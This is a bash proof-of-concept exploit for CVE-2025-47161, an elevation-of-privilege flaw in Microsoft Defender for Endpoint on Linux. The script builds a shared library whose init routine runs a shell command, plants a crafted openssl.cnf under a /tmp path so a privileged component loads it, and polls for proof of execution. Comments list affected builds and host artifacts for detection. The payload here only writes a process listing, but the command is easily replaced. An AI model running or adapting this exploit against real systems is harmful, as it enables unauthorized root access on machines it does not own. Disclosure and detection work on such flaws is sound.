
#!/bin/bash
#
# Proof of concept for CVE-2025-47161 (Microsoft Defender for Endpoint on
# Linux; affected builds are listed below). Flow of the script: build a shared
# object whose ELF init routine runs an OS command, drop an OpenSSL config under
# a /tmp path whose engine "dynamic_path" points at that object, then poll for
# the marker file the init routine writes. Why a privileged MDE component
# presumably honours an OpenSSL config under /tmp is not shown here -- see the
# vendor advisory and blog links below.
#
# Host artifacts a defender can hunt for (all taken from the commands below):
#   mde-exp.c and woot.o in the working directory, /tmp/woot.so,
#   /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf,
#   /woot.txt (a "ps -ef" listing), and a long-sleeping process that loaded the
#   library.
#
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
# Print the installed MDE build (mdatp CLI) so it can be compared with the
# vulnerable-build list above before anything is staged.
echo "MDE Version: $(mdatp version)"

# stage
# Write the payload source. It is compiled below with -Wl,-init,woot, so woot()
# runs as soon as the library is loaded, with no caller needed: it prints a
# marker when stderr is a terminal, writes a "ps -ef" listing to /woot.txt via
# system(), then sleeps so the loading process stays alive. The heredoc
# delimiter is unquoted, so the body is subject to shell expansion; that is
# harmless here because the C source contains no "$" or backticks.
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

void woot(){
// for manual testing
if(isatty(STDERR_FILENO)) {
fprintf(stderr,"Woot!\n");
}
system("ps -ef > /woot.txt");
sleep(3000000);
}

EOF

# build exploit
# Same two gcc steps as in the C header comment. The library must land at
# /tmp/woot.so because the openssl.cnf written below references that exact path.
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

# Directory tree the crafted openssl.cnf is placed in -- presumably the location
# the target component reads its OpenSSL configuration from (see advisory).
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

# The config registers an engine whose dynamic_path is /tmp/woot.so. "init = 0"
# appears to be enough because the payload runs from the ELF init routine set
# with -Wl,-init above, not from OpenSSL's engine initialisation.
cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF

# Poll for the marker written by woot(); once it exists, "ls -ld" shows the
# file's owner, which is the evidence of the context the library was loaded in.
echo "Checking every 15 seconds for /woot.txt"
while true
do
if [[ -f /woot.txt ]]
then
echo "WOOT - /woot.txt exists"
ls -ld /woot.txt
exit
fi
sleep 15
done